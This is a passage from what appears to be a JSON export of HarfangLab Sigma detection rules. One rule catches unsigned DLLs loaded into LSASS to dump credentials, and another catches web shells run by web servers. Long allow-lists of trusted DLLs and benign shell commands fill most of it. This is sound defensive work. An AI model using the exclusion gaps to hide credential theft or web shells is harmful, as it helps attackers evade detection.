691a7aff42d558fac26f2a9de6b47d7596b130e730597dc3aff6025cb484d4a1\n # File version: 10.0.19041.546 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\dhcpcsvc.dll'\n Company: 'Microsoft Corporation'\n Description: 'DHCP Client Service'\n\n exclusion_bit4:\n # SHA256: 2b0d877e6d81cfea0fc9d9a238e5c9f70e2d972ab8fdd6602feb0ddcb0d1c5d3\n ImageLoaded: '?:\\Windows\\System32\\bit4upki-store.dll'\n Company: 'bit4id srl'\n Description: 'csp-certstore Dynamic Link Library'\n\n exclusion_docker:\n # C:\\ProgramData\\docker\\windowsfilter\\2337d416d51a27c0f2d246b6fc5509813cdf743e237675dc1c10389d1e811ea0\\Files\\Windows\\System32\\schannel.dll\n # C:\\ProgramData\\docker\\windowsfilter\\2337d416d51a27c0f2d246b6fc5509813cdf743e237675dc1c10389d1e811ea0\\Files\\Windows\\System32\\efslsaext.dll\n ImageLoaded|startswith:\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\System32\\'\n - '*\\docker\\data\\windowsfilter\\\\*\\Files\\Windows\\Syswow64\\'\n\n exclusion_ktmw32:\n # SHA256: 61c3bd3f278ea73886c0a0beae617469485af77945c670f492b07136ac079b1e\n # File version: 10.0.17763.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\ktmw32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows KTM Win32 Client DLL'\n\n exclusion_vaultcli:\n # SHA256: 958b36962aa44458fbf7f5e5ba4f7318d59cdbe823c24969962573c8afdf2db3\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\vaultcli.dll'\n Company: 'Microsoft Corporation'\n Description: 'Credential Vault Client Library'\n\n exclusion_usermgrproxy:\n # SHA256: 68eb46851a1c0bbb65ebc20f2cfb22088afefcb5bb25a2d89acbd9c01600f199\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\UserMgrProxy.dll'\n Company: 'Microsoft Corporation'\n Description: 'UserMgrProxy'\n\n exclusion_urlmon:\n # SHA256: 
68eb46851a1c0bbb65ebc20f2cfb22088afefcb5bb25a2d89acbd9c01600f199\n # File version: 11.00.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\urlmon.dll'\n Company: 'Microsoft Corporation'\n Description: 'OLE32 Extensions for Win32'\n\n exclusion_oberthur:\n # SHA256: 130edbb63d52004cd25cefb0dfdb8efd113f72cd42f8a9cd7a3577a12fbb0c84\n ImageLoaded: '?:\\Program Files\\Oberthur Technologies\\AWP\\DLLs\\OcsCsp.dll'\n Company: 'Oberthur Technologies'\n Description: 'OCS Cryptographic Service Provider'\n OriginalFileName: 'OCSCsp.dll'\n\n exclusion_ibm_npnotes:\n # SHA256: b02cd69fd6b2f7ae6e5d3f7f2fef3603efa59bdecc0fe3a708550c8b16c2a9c2\n ImageLoaded|endswith: '\\npnotes64.dll'\n Company: 'IBM Corporation'\n Description: 'Notes Network Provider'\n OriginalFileName: 'npnotes'\n\n exclusion_authz:\n # SHA256: 4e4ef8c31583ece0a3b8ed92ff5cc9d04d6ceaf90fa00cdb8adee3808a835bdb\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n ImageLoaded: '?:\\Windows\\System32\\authz.dll'\n Company: 'Microsoft Corporation'\n Description: 'Authorization Framework'\n\n exclusion_kmkd:\n # SHA256: 2e68f8e34cf846bbdb3b752eb25a982c1a5b7e161ceebd6714ffbba14a43f2be\n # File version: 10.0.14393.3024 (rs1_release.190530-2002)\n ImageLoaded: '?:\\Windows\\System32\\kmkd.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows HMAC Key Derivation API'\n\n exclusion_wshqos:\n # SHA256: 5c743290c03f259b536d0f24da5b7020863de913ab55b6c5d845803d1c5242bb\n # File version: 6.1.7601.24000 (win7sp1_ldr.171231-1547)\n ImageLoaded: '?:\\Windows\\System32\\wshqos.dll'\n Company: 'Microsoft Corporation'\n Description: 'QoS Winsock2 Helper DLL'\n\n exclusion_winbrand:\n # SHA256: 19959d18601712901f03b83150d15e34ebcab355bb4692c9a28511a72f57fc66\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\winbrand.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Branding Resources'\n\n exclusion_morpho:\n # SHA256: 
601f5bd444f3498a79ae51a0097ae0361490cc1128db0a050f59a52cfc8f1b08\n ImageLoaded: '?:\\Windows\\System32\\RCnfCSP64.dll'\n Company: 'Morpho e-Documents'\n Description: 'Morpho Removable Token Cryptographic Provider'\n OriginalFileName: 'RCnfCSP64.dll'\n\n exclusion_ecc:\n ImageLoaded: '?:\\Program FIles\\IAS ECC Middleware\\Bin\\\\*'\n Company: 'Gemalto'\n\n exclusion_wkscli:\n # SHA256: 6fd0dc73dbe7519e2c643554c2a7f8fbe4f9a678c4241bb54b3c6e65d2abcf3a\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\wkscli.dll'\n Company: 'Microsoft Corporation'\n Description: 'Workstation Service Client DLL'\n OriginalFileName: 'WKSCLI.DLL'\n\n exclusion_dsrole:\n # SHA256: 73566223914bf670df6b5931fa213e546713531b10391ed65b5256bbd7abde7f\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\dsrole.dll'\n Company: 'Microsoft Corporation'\n Description: 'DS Role Client DLL'\n OriginalFileName: 'DSROLE.DLL'\n\n exclusion_netapi32:\n # SHA256: 335acb68c2875c5ec7412af3316212f3470cf3b1a46168115777f60341a390a4\n # File version: 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n ImageLoaded: '?:\\Windows\\System32\\netapi32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Net Win32 API DLL'\n OriginalFileName: 'NetApi32.DLL'\n\n exclusion_shlwapi:\n # SHA256: 257220b2e13a535bea8b05289a1e615a1d1c958445c2a0f8ded40e45da7a5d9f\n # File version: 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n ImageLoaded: '?:\\Windows\\System32\\shlwapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Shell Light-weight Utility Library'\n OriginalFileName: 'SHLWAPI.DLL'\n\n exclusion_netutils:\n # SHA256: 127506d1db38275614cbeb047c133718ef9d03266ba9c98be55ec7847cfc9c3d\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\netutils.dll'\n Company: 'Microsoft Corporation'\n Description: 'Net Win32 API Helpers DLL'\n OriginalFileName: 'NETUTILS.DLL'\n\n exclusion_apphelp:\n # 
SHA256: a1afd2fd6da5968f6d83733c98d301c82ba33988d28ebfcf2f50eb3b40ef5611\n # File version: 6.1.7601.19050 (win7sp1_gdr.151029-0600)\n ImageLoaded: '?:\\Windows\\System32\\apphelp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Application Compatibility Client Library'\n OriginalFileName: 'Apphelp'\n\n exclusion_iphlpapi:\n # SHA256: a656353c50ee08422145d00db9cfd9f6d3e664753b3c454b171e2a56a8aa94dc\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\IPHLPAPI.DLL'\n Company: 'Microsoft Corporation'\n Description: 'IP Helper API'\n OriginalFileName: 'iphlpapi.dll'\n\n exclusion_slc:\n # SHA256: 90a88986c8c5f30fb153ec803feda6572b2c2630a6c9578fcc017800692694d5\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\slc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Software Licensing Client Dll'\n OriginalFileName: 'slcdll.dll'\n\n exclusion_winhttp:\n # SHA256: 52c33c1f6e18465733da0f410a8ce85a17517e66292bd01ff3ae42a142500eaa\n # File version: 6.1.7601.24000 (win7sp1_ldr.171231-1547)\n ImageLoaded: '?:\\Windows\\System32\\winhttp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows HTTP Services'\n OriginalFileName: 'winhttp.dll'\n\n exclusion_wldap32:\n # SHA256: 4fb4a459bc00ff1b8bd80d96e3031997dbf052efb29614ce4c212570fe205c38\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\Wldap32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Win32 LDAP API DLL'\n OriginalFileName: 'WLDAP32.dll'\n\n exclusion_wshtcpip:\n # SHA256: b2025742b5f0025ace9821d5722de3f997eeeab21d2f381c9e307882df422579\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\wshtcpip.dll'\n Company: 'Microsoft Corporation'\n Description: 'Winsock2 Helper DLL (TL/IPv4)'\n OriginalFileName: 'wshtcpip.dll'\n\n exclusion_winnsi:\n # SHA256: 
5d487e311401138ece73c734dda7b4f8d9d9058bb9e03589cf796652214c47c4\n # File version: 6.1.7601.23889 (win7sp1_ldr.170810-1615)\n ImageLoaded: '?:\\Windows\\System32\\winnsi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Network Store Information RPC interface'\n OriginalFileName: 'winnsi.dll'\n\n exclusion_psbase:\n # SHA256: 59d7c2a5097f83e8d07caafcf9c6f9c6849af24c28047fd4d4d6b5673ee8d089\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\psbase.dll'\n Company: 'Microsoft Corporation'\n Description: 'Protected Storage default provider'\n OriginalFileName: 'psbase.dll'\n\n exclusion_cfgmgr32:\n # SHA256: 00a09caf9129e84feea98fa03ce9012c9f961b64fee15c4f268822c0f82acc3c\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\cfgmgr32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Configuration Manager DLL'\n OriginalFileName: 'cfgmgr32.dll'\n\n exclusion_ole32:\n # SHA256: 0d2d416279c2e0c80dc1740b5ee0f2df4484c13eed8ddf798af4e705d5373bc9\n # File version: 6.1.7601.24537 (win7sp1_ldr_escrow.191114-1547)\n ImageLoaded: '?:\\Windows\\System32\\ole32.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft OLE for Windows'\n OriginalFileName: 'OLE32.dll'\n\n exclusion_gpapi:\n # SHA256: 82ebeb5ddd3d2e8d8877b5645868df8e2f0b07e6ce943d36cef05205905ae835\n # File version: 6.1.7601.23452 (win7sp1_ldr.160512-0600)\n ImageLoaded: '?:\\Windows\\System32\\gpapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'Group Policy Client API'\n OriginalFileName: 'gpapi.dll'\n\n exclusion_pstorsvc:\n # SHA256: 37c890abcac01f610f00e900a59b08cf4f17bfc49459eebf0058efe02fd628ee\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\pstorsvc.dll'\n Company: 'Microsoft Corporation'\n Description: 'Protected storage server'\n OriginalFileName: 'Protected storage server'\n\n exclusion_setupapi:\n # SHA256: 
12130837d7f89a2c7e9d25747a8e5b9001e0a38d545178b49b450c23ae62664a\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\SETUPAPI.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Setup API'\n OriginalFileName: 'SETUPAPI.dll'\n\n exclusion_devrtl:\n # SHA256: 63c58551f32b0b09377f64a6ae1fa81af93b8a707a57a8c18722086906ad3046\n # File version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\DEVRTL.dll'\n Company: 'Microsoft Corporation'\n Description: 'Device Management Run Time Library'\n OriginalFileName: 'DEVRTL.dll'\n\n exclusion_devobj:\n # SHA256: c5e61b11ddbbbbba3d9488970524f0975ea5fbdf16e2fa31f579f8bfa48353b1\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\devobj.dll'\n Company: 'Microsoft Corporation'\n Description: 'Device Information Set DLL'\n OriginalFileName: 'devinfoset.dll'\n\n exclusion_samlib:\n # SHA256: d1e9a67772108fff9083e31ed8ce8a8805ad43465ad4a21b93bc86045212c813\n # File version: 6.1.7601.23677 (win7sp1_ldr.170209-0600)\n ImageLoaded: '?:\\Windows\\System32\\samlib.dll'\n Company: 'Microsoft Corporation'\n Description: 'SAM Library DLL'\n OriginalFileName: 'SAMLib.dll'\n\n exclusion_sensapi:\n # SHA256: 3f9d4ee64e4210340c6fee0de81bfe3c613ddbe608ec09d63817d24ce24bfc5e\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\SensApi.dll'\n Company: 'Microsoft Corporation'\n Description: 'SENS Connectivity API DLL'\n OriginalFileName: 'SensApi.dll'\n\n exclusion_mpr:\n # SHA256: 0f7a80db821fde6580e9481b6da44844f717ddb4983b0e3d562be43726153951\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\mpr.dll'\n Company: 'Microsoft Corporation'\n Description: 'Multiple Provider Router DLL'\n OriginalFileName: 'mpr.dll'\n\n exclusion_qagentrt:\n # SHA256: bd540499f74e8f59a020d935d18e36a3a97c1a6ec59c8208436469a31b16b260\n # File version: 
6.1.7601.17514 (win7sp1_rtm.101119-1850)\n ImageLoaded: '?:\\Windows\\System32\\QAgentRT.dll'\n Company: 'Microsoft Corporation'\n Description: 'Quarantine Agent Service Run-Time'\n OriginalFileName: 'QAgentRT.dll'\n\n exclusion_ntmarta:\n # SHA256: 184547fac0c3d7148faa3f601929a7089de393bd19929a137dad743331dd3f77\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\ntmarta.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows NT MARTA provider'\n OriginalFileName: 'ntmarta.dll'\n\n exclusion_fveui:\n # SHA256: 2dfbd792b68f3ebef0843183cae5d52b6fa04163808afacf6c0d738455898c36\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\fveui.dll'\n Company: 'Microsoft Corporation'\n Description: 'BitLocker Drive Encryption UI'\n OriginalFileName: 'FVEUI.dll'\n\n exclusion_p2pcollab:\n # SHA256: 1158011e4a1298dec79133b40888aa87b06f5b64ba2ab461b58c22f5f9211d0c\n # File version: 6.1.7600.16385 (win7_rtm.090713-1255)\n ImageLoaded: '?:\\Windows\\System32\\p2pcollab.dll'\n Company: 'Microsoft Corporation'\n Description: 'Peer-to-Peer Collaboration'\n OriginalFileName: 'p2pcollab.dll'\n\n exclusion_ncryptsslp:\n # SHA256: 593f8a8cf0cceb342b4eb1fe70afaab69524406ec10242167591deb803dc1f5e\n # File version: 6.3.9600.20618 (winblue_ltsb_escrow.220916-1725)\n ImageLoaded: '?:\\Windows\\System32\\ncryptsslp.dll'\n Company: 'Microsoft Corporation'\n Description: 'Microsoft SChannel Provider'\n OriginalFileName: 'ncryptsslp.dll'\n\n exclusion_wuaueng:\n # SHA256: 6a8a714de3cd39c8a02654db6c9c7184658f5b37a065a18a1f697d280b764600\n # File version: 7.6.7601.24436 (win7sp1_ldr.190409-0600)\n ImageLoaded: '?:\\Windows\\System32\\wuaueng.dll'\n Company: 'Microsoft Corporation'\n Description: 'Windows Update Agent'\n OriginalFileName: 'wuaueng.dll'\n\n exclusion_edpauditapi:\n # SHA256: 2a7a66afd6d3853fa3b3c19daf67d1064a2183f5040cb1a1a1d4150225d8920f\n # File version: 10.0.19041.1 (WinBuild.160101.0800)\n 
ImageLoaded: '?:\\Windows\\System32\\edpauditapi.dll'\n Company: 'Microsoft Corporation'\n Description: 'edpauditapi.dll'\n OriginalFileName: 'wuaueng.dll'\n\n exclusion_gip_cps:\n ImageLoaded: '?:\\Program Files\\GIP-CPS\\CPSRev.dll'\n\n exclusion_apple_bonjour_mdns:\n ImageLoaded: '?:\\Program Files\\Bonjour\\mdnsNSP.dll'\n Company: 'Apple Inc.'\n Description: 'Bonjour Namespace Provider'\n\n exclusion_gemalto:\n ImageLoaded:\n - '?:\\Program Files\\Gemalto\\Classic Client\\BIN\\\\*'\n - '?:\\Program Files\\Gemalto\\Common\\Resources\\LocHub.dll'\n Company:\n - 'Gemalto'\n - 'GemSafe'\n\n exclusion_enovacom:\n ImageLoaded: '?:\\Program Files\\Enovacom\\eSSO\\bin\\esso_rp.dll'\n Company: 'Enovacom'\n\n exclusion_vmware:\n ImageLoaded: '?:\\Windows\\System32\\VMWSU_V1_0.DLL'\n Company: 'VMware, Inc.'\n Description: 'VMware SU Authentication Provider'\n OriginalFileName: 'VMWSU_V1_0.DLL'\n\n exclusion_wshhyperv:\n # SHA256: 8ba848ac78e408b577f702cc70794b5aae03ddc1ca2fe003add905f91a60efc0\n # File version: 10.0.14393.2969 (rs1_release.190503-1820)\n ImageLoaded: '?:\\Windows\\System32\\wshhyperv.dll'\n Company: 'Microsoft Corporation'\n Description: 'Hyper-V Winsock2 Helper DLL'\n OriginalFileName: 'wshhyperv.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "cb289a71-4836-4f9d-b12c-c0582903d497",
"rule_name": "Unsigned DLL Loaded by LSASS",
"rule_description": "Detects when an unsigned DLL or EXE is loaded by the LSASS process.\nAttackers may try to load DLLs into LSASS in an attempt to dump credentials from its memory.\nThis could also be a legitimate third-party DLL adding features to the machine's authentication mechanism.\nIt is recommended to identify the unsigned DLL to determine whether it is malicious and to document legitimate third-party DLLs.\n",
"rule_creation_date": "2020-09-30",
"rule_modified_date": "2026-02-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "cb325077-7493-4f82-9b3f-208764d322eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.623245Z",
"creation_date": "2026-03-23T11:45:34.623247Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.623252Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/20/g/ensiko--a-webshell-with-ransomware-capabilities.html",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authentication-and-encryption-in-pas-web-shell-variant/",
"https://attack.mitre.org/techniques/T1203/",
"https://attack.mitre.org/techniques/T1505/003/",
"https://attack.mitre.org/techniques/T1190/"
],
"name": "t1203_web_shell.yml",
"content": "title: Possible Web Shell Execution\nid: cb325077-7493-4f82-9b3f-208764d322eb\ndescription: |\n Detects the execution of a suspicious shell process by a common web server software likely related to a web shell or a command injection via a vulnerable application.\n Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.\n Adversaries may also backdoor web servers with web shells to establish persistent access to systems.\n It is recommended to analyze the command-line as well as to correlate this alert with other commands executed around it from the web server to determine their legitimacy.\nreferences:\n - https://www.trendmicro.com/en_us/research/20/g/ensiko--a-webshell-with-ransomware-capabilities.html\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/authentication-and-encryption-in-pas-web-shell-variant/\n - https://attack.mitre.org/techniques/T1203/\n - https://attack.mitre.org/techniques/T1505/003/\n - https://attack.mitre.org/techniques/T1190/\ndate: 2021/09/17\nmodified: 2026/01/28\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1203\n - attack.persistence\n - attack.t1505.003\n - attack.initial_access\n - attack.t1190\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.InitialAccess\n - classification.Linux.Behavior.Exploitation\n - classification.Linux.Behavior.Persistence\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_parent_standard:\n ParentImage|endswith:\n - '/apache2'\n - '/httpd'\n - '/nginx'\n - '/php-fpm'\n User:\n - 'root'\n - 'apache'\n - 'nginx'\n - 'www-data'\n - 'http'\n\n selection_parent_php_fpm:\n # NOTE: On Ubuntu, php-fpm have its version as a suffix...\n ParentImage: '*php-fpm*'\n User:\n - 'root'\n - 'www-data'\n - 'php-fpm'\n # On CentOS, default user of php-fpm is apache but it can be changed by sysadmins to nginx. 
Handle both case.\n - 'apache'\n - 'nginx'\n\n selection_shell_execution:\n CommandLine|contains: '-c'\n Image|endswith:\n - '/sh'\n - '/bash'\n - '/dash'\n - '/zsh'\n\n exclusion_system_utilities_with_args:\n CommandLine|startswith:\n - 'sh -c echo '\n - 'sh -c ps '\n - 'sh -c gs '\n - 'sh -c uname '\n - 'sh -c which '\n - 'sh -c sed '\n - 'sh -c sendmail '\n - 'sh -c /sbin/ldconfig'\n - 'sh -c /usr/sbin/sendmail '\n - 'sc -c /usr/lib/sendmail '\n - 'sh -c /usr/bin/unzip '\n - 'sh -c date '\n - 'sh -c exec date '\n - 'sh -c command -v '\n - 'sh -c 7za '\n - 'sh -c unrar '\n - 'sh -c rar '\n - 'sh -c unzip '\n - 'sh -c zip '\n - 'sh -c xz '\n - 'sh -c bzip2 '\n - 'sh -c gzip '\n - 'sh -c tar '\n - 'sh -c sf '\n - 'sh -c file '\n - 'sh -c hostname '\n - 'sh -c unoconv '\n - 'sh -c exec /bin/hostname '\n - 'sh -c /bin/ping -c 1 -W 1 '\n - 'sh -c ping -c 1 -w 1'\n - 'sh -c ping -c 1 -w 2'\n - 'sh -c sudo quota -u '\n - 'sh -c realpath ~'\n - 'sh -c ionice -c '\n - 'sh -c pdftotext '\n\n exclusion_system_utilities_no_args:\n CommandLine:\n - 'sh -c uname'\n - 'sh -c date'\n - 'sh -c exec date'\n - 'sh -c hostname'\n - 'sh -c exec /bin/hostname'\n\n exclusion_version:\n CommandLine:\n - 'sh -c * -version'\n - 'sh -c * --version'\n\n exclusion_monitoring:\n CommandLine|startswith:\n - 'sh -c /home/*/phpinfoserv'\n - 'sh -c /home/*/phpexec'\n - 'get delivery schedules'\n - 'get trigger detail'\n - 'get sessions'\n - 'sh -c stat'\n - 'sh -c /usr/bin/msmtp'\n - 'sh -c cat /proc/uptime'\n - 'sh -c ?cat? ?/proc/cpuinfo?'\n - 'sh -c cat /proc/meminfo'\n - 'sh -c ?awk? ?/MemTotal/ {print $2}? ?/proc/meminfo?'\n - 'sh -c ?awk? ?/SwapTotal/ {print $2}? 
?/proc/meminfo?'\n\n exclusion_version_checks:\n CommandLine:\n - 'sh -c ghostscript -v'\n - 'sh -c libreoffice --version'\n - 'sh -c java --version'\n - 'sh -c identify --version'\n - 'sh -c HandBrakeCLI --version 2>&1'\n - 'sh -c apachectl -V'\n - 'sh -c pdfinfo -v 2>&1'\n\n exclusion_custom_tools:\n CommandLine|startswith:\n - 'sh -c /data/'\n - 'sh -c /opt/'\n\n # Unfortunately it is very common for webapps to enumerate the available interfaces or ip addresses\n exclusion_address_enumeration:\n CommandLine|startswith:\n - 'sh -c /bin/cat /sys/class/net/*/address'\n - 'sh -c /sbin/ip -? addr'\n - 'sh -c for * in * /sys/class/net/*/address'\n\n exclusion_timedatectl:\n CommandLine|startswith:\n - 'sh -c timedatectl status'\n - 'sh -c lc_all=c timedatectl status'\n\n exclusion_gpgconf_kill:\n CommandLine|startswith: 'sh -c /usr/bin/gpgconf --kill gpg-agent'\n\n exclusion_supervisorctl:\n CommandLine|startswith: 'sh -c supervisorctl status '\n\n exclusion_centreon:\n - CommandLine:\n - 'sh -c /usr/bin/rrdtool -'\n - 'sh -c /usr/bin/rrdtool - ' # 1 space at the end\n - 'sh -c sudo service cbd reload'\n\n # sh -c '/usr/sbin/centengine' -v /var/cache/centreon/config/engine/'37'/centengine.DEBUG 2>&1\n - CommandLine|startswith:\n - \"sh -c '/usr/sbin/centengine' \"\n - 'sh -c /usr/sbin/centengine '\n\n exclusion_nagios:\n - CommandLine:\n - 'sh -c /usr/bin/rrdtool fetch /usr/local/nagios/share/perfdata/*'\n - 'sh -c rrdtool xport --step *'\n - CommandLine|startswith:\n - 'sh -c /usr/local/nagiosxi/'\n - 'sh -c /usr/lib64/nagios/'\n\n exclusion_cacti:\n CommandLine:\n - 'sh -c /usr/bin/rrdtool graph -*'\n - 'sh -c /usr/bin/rrdtool info *'\n - 'sh -c /usr/bin/php plugins/realtime/poller_rt.php *'\n - 'sh -c pidof -o $$ -o %PPID -x ged'\n - 'sh -c /usr/bin/rrdtool -v 2>&1'\n - \"sh -c /usr/bin/php -q '/usr/share/cacti/install/cli_test.php' *\"\n - \"sh -c /usr/bin/php -q '/usr/share/cacti/install/cli_check.php' extensions\"\n - 'sh -c nproc'\n - 'sh -c 
/usr/bin/snmpbulkwalk -O QnU -c *'\n - 'sh -c /usr/bin/snmpget -V 2>&1'\n\n exclusion_stor2rrd:\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/configuration.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/glob_configuration.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/graphviz.sh\n # /bin/sh /data/stor2rrd/stor2rrd-cgi/overview.sh\n CommandLine:\n - '/bin/sh */stor2rrd/stor2rrd-cgi/configuration.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/glob_configuration.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/graphviz.sh'\n - '/bin/sh */stor2rrd/stor2rrd-cgi/overview.sh'\n\n exclusion_sphinx:\n # /home/httpd/tools/sphinx-manager/web\n CurrentDirectory: '*/sphinx-manager/web'\n # sh -c php /etc/sphinx/sphinx.conf| grep ' log ' | awk -f'=' '{ print $2 }'\n # sh -c php /etc/sphinx/sphinx.conf| grep path | grep force | awk -F'=' '{ print $2 }'\n # sh -c searchd --help | head -n1\n # sh -c git name-rev --name-only HEAD\n # sh -c ps ax | grep indexer | grep -v grep | grep -v sudo\n # sh -c ps ax | grep indexer | grep -v grep | grep -v sudo | grep -E '....\n # sh -c ps ax | grep searchd | grep config | grep -v grep | awk -F'config ' '{print $2}' | tail -n1\n # sh -c tail -n 100 /var/log/sphinx/searchd.log | sort -r\n CommandLine:\n - 'sh -c php /etc/sphinx/sphinx.conf*'\n - 'sh -c searchd --help ? head -n1'\n - 'sh -c git name-rev --name-only HEAD'\n - 'sh -c ps ax ? grep indexer ? grep -v grep ? grep -v sudo*'\n - 'sh -c ps ax ? 
grep searchd*'\n - 'sh -c tail -n 100 /var/log/sphinx/searchd.log*'\n - 'sh -c searchd --help | head -n1'\n - 'sh -c tail -n 100 /var/log/sphinx/searchd.log | sort -r'\n\n exclusion_gpg_misp:\n # sh -c /usr/bin/gpg --status-fd '3' --command-fd '4' --no-secmem-warning --no-tty --no-default-keyring --no-options --no-permission-warning\n # --exit-on-status-write-error --trust-model always --pinentry-mode loopback --ignore-time-conflict --ignore-valid-from --with-colons --with-fingerprint\n # --with-fingerprint --fixed-list-mode --homedir '/var/www/MISP/.gnupg' --utf8-strings --list-secret-keys -- ....'\n CommandLine|contains|all:\n - '/usr/bin/gpg'\n - '--status-fd'\n - '--command-fd'\n - '--fixed-list-mode'\n - '/var/www/MISP/.gnupg'\n\n exclusion_misp:\n # sh -c /var/www/MISP/app/Console/cake CakeResque.CakeResque start --interval 5 --queue default > /dev/null 2>&1 &\n CommandLine: 'sh -c /var/www/MISP/app/Console/cake CakeResque.CakeResque *'\n\n # https://github.com/matomo-org/matomo\n exclusion_matomo:\n CurrentDirectory|contains: 'matomo'\n CommandLine:\n - 'sh -c */bin/php -r ?echo phpversion();?'\n - \"sh -c ps x 2>/dev/null | awk '! 
